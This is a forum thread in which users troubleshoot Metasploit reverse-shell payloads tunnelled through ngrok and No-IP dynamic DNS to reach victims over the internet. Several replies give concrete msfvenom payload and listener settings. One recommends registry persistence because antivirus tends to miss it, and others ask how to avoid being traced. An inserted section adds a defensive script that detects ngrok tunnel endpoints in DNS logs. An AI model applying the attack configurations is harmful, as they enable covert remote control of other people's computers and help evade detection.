Forum Thread: How to Use NGROK in a Reverse_Tcp Attack?

I was thinking of using ngrok in a reverse_tcp attack over the internet on Kali Linux. But I couldn't do so; I didn't get an open session. I used the ngrok URL in place of LHOST while creating the payload.

Can anyone help?

21 Responses


Actually, I have some problems with port forwarding; that is why I can't use No-IP. But ngrok works smoothly and also port-forwards properly.

Though your tutorial was really impressive and informative.

Yeah, it port-forwards well. Set tools never worked; I couldn't port-forward until I used ngrok.

Hey,
how can we use DNS in reverse_tcp?
I can't.

I have exactly the same problem. I use ngrok to forward the connection to localhost,
as I can't forward any port on my router (too bad... old one!).

But when I set LHOST to the ngrok URL and LPORT to 80 when creating the payload with msfvenom, I can't get a session on the console :(

What do you suggest, guys? Can I use the same reverse_tcp_dns on Android?

Hey, I also tried everything but can't get the meterpreter session over the internet with my mobile hotspot. Please show me the way for WAN.

You should not, because it changes LPORT and LHOST every time you run it.

Hi, to use ngrok in a TCP Android payload (for example) you need to type:
./ngrok tcp <port>
You will get something like 0.tcp.ngrok.io:17565

Then make the payload with LHOST=0.tcp.ngrok.io and LPORT=17565

For the listener use: lhost 127.0.0.1 and lport <port> (the one used at the top)

Enjoy my help, it's free! :D

./ngrok tcp <port>
Are we the ones who enter the port number?

Are we supposed to create a new payload every time? Because the port changes every time I close the ngrok session.

Yes, you are supposed to create a new payload every time you close the ngrok session, or perhaps you should buy a premium account.

I think you could use No-IP with reverse_http (or https).
For example:
ngrok http 443
Forwarding ebf05ae7.ngrok.io -> localhost:443

Then create a Dynamic DNS:

Then you can just update your host if you have a new ngrok session, and it would still work with the same payload.

Payload: msfvenom -p <platform>/meterpreter/reverse_http(s) lhost=ngrok-connection.ddns.net lport=443 -o <file>

Listener:
set payload <platform>/meterpreter/reverse_http(s)
set lhost 127.0.0.1
set lport 443

Hope it works ;)
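The two answers above describe the same thing from the attacker's side: a listener reachable through an ngrok tunnel hostname (0.tcp.ngrok.io:17565), optionally fronted by a dynamic-DNS name (ngrok-connection.ddns.net) so the payload survives tunnel restarts. For anyone on the defending side of this, the useful counterpart is spotting those tunnel endpoints in DNS resolver or proxy logs. The script below is an added example written for this page; it is not code from the thread or from ngrok. It assumes a simple key=value log line format and uses constructed sample lines built from the hostnames quoted in the thread. It flags any lookup or connection to an ngrok tunnel name, and separately reports dynamic-DNS names whose answer resolves to ngrok, which is exactly the No-IP-in-front-of-ngrok arrangement described above.

```python
"""Flag ngrok tunnel endpoints in DNS/proxy log lines (defensive detection example)."""
import re
from dataclasses import dataclass

# Tunnel domain ngrok hands out, as quoted in the thread (0.tcp.ngrok.io, ebf05ae7.ngrok.io).
# Treating ".ngrok.io" as the only suffix is an assumption for this example.
NGROK_SUFFIXES = (".ngrok.io",)

# key=value fields whose value may carry a hostname or host:port
HOST_FIELDS = ("query", "conn", "answer")

# Constructed sample lines in a simple key=value style; not taken from any real system.
SAMPLE_LOGS = [
    "2024-01-01T10:00:01Z host=ws-17 query=0.tcp.ngrok.io type=A",
    "2024-01-01T10:00:02Z host=ws-17 conn=0.tcp.ngrok.io:17565 proto=tcp",
    "2024-01-01T10:00:05Z host=ws-22 query=ebf05ae7.ngrok.io type=A",
    "2024-01-01T10:00:09Z host=ws-22 query=ngrok-connection.ddns.net type=CNAME answer=ebf05ae7.ngrok.io",
    "2024-01-01T10:01:00Z host=ws-03 query=www.example.com type=A",
    "2024-01-01T10:01:02Z host=ws-03 conn=203.0.113.10:443 proto=tcp",
]

_KV_RE = re.compile(r"(\w+)=(\S+)")
_HOSTPORT_RE = re.compile(r"^(?P<name>[^:\s]+)(?::(?P<port>\d+))?$")


@dataclass
class Finding:
    source: str     # internal machine that made the lookup or connection
    indicator: str  # hostname that matched an ngrok tunnel suffix
    field: str      # log field the hostname came from
    line: str       # original log line, for the analyst


def parse_fields(line: str) -> dict:
    """Turn 'a=b c=d' into a dict; the leading timestamp has no '=' and is ignored."""
    return dict(_KV_RE.findall(line))


def hostname_of(value: str):
    """Strip an optional :port and trailing dot, lower-case; None if not host-like."""
    m = _HOSTPORT_RE.match(value)
    if not m:
        return None
    return m.group("name").rstrip(".").lower()


def is_ngrok_tunnel(name: str) -> bool:
    """True for any name under one of the ngrok tunnel suffixes."""
    return any(name.endswith(suffix) for suffix in NGROK_SUFFIXES)


def scan(lines) -> list:
    """Return one Finding per log field that names an ngrok tunnel endpoint."""
    findings = []
    for line in lines:
        fields = parse_fields(line)
        source = fields.get("host", "?")
        for field in HOST_FIELDS:
            if field not in fields:
                continue
            name = hostname_of(fields[field])
            if name and is_ngrok_tunnel(name):
                findings.append(Finding(source, name, field, line))
    return findings


def ddns_fronts(lines) -> dict:
    """Map non-ngrok names (e.g. a dynamic-DNS host) to the ngrok tunnel they resolve to."""
    fronts = {}
    for line in lines:
        fields = parse_fields(line)
        query, answer = fields.get("query"), fields.get("answer")
        if not (query and answer):
            continue
        qname, aname = hostname_of(query), hostname_of(answer)
        if qname and aname and is_ngrok_tunnel(aname) and not is_ngrok_tunnel(qname):
            fronts[qname] = aname
    return fronts


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"{f.source}: {f.field}={f.indicator}")
    print("dynamic-DNS fronts:", ddns_fronts(SAMPLE_LOGS))
```

The `answer` field matters: a resolver log that records only the queried name would miss the dynamic-DNS front, since ngrok-connection.ddns.net itself does not match the suffix. Logging the resolved answer (or the CNAME chain) is what lets `ddns_fronts` tie the two together.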

So can we use ngrok and No-IP together? And what if we shut down our system, will we be able to get a listening session again when we turn the system on?

I have never really tried ngrok, but from the comment you posted under, it looks like you can use No-IP and ngrok. As for your other question, since the attack occurs in the victim's memory, it will be killed by a system restart. To get a session again, you will need to rerun the payload on the victim computer or set up persistence. There are a few ways of setting up persistence, but they could be detected by AV more easily as you are leaving something on the hard drive. Personally I like to use registry persistence, as it only leaves entries in the registry and is not likely to be detected.

Well, yeah, I can make it persistent. But do you know any way to hide yourself while doing that? Like using the Whonix gateway or anonsurf while using ngrok and No-IP to create the payload and listen for it?

I tried this method. Everything worked but I did not receive a meterpreter session.
Could you guide me with this?

How can we be anonymous while using the Metasploit listener? Any help please :) thanks :)

Hi, how do I make a post on the forum?

Hi!

Umm, I got a question... Can I use ngrok when creating payloads (msfvenom) to avoid being traced? Or is it better to use the public IP address that Tor gives me... hehehe

Thanks in advance.
Sorry for my bad English.

I don't understand why people say "Sorry for my bad English" when everything they wrote makes sense.

Don't forget that if you use ngrok to forward port 80, and you are serving your payload on your Apache server with default configuration, you will have to kill the Apache server immediately after the payload is downloaded, or it will interfere with your meterpreter session. I ran into this problem on guest networks where most ports are blocked.
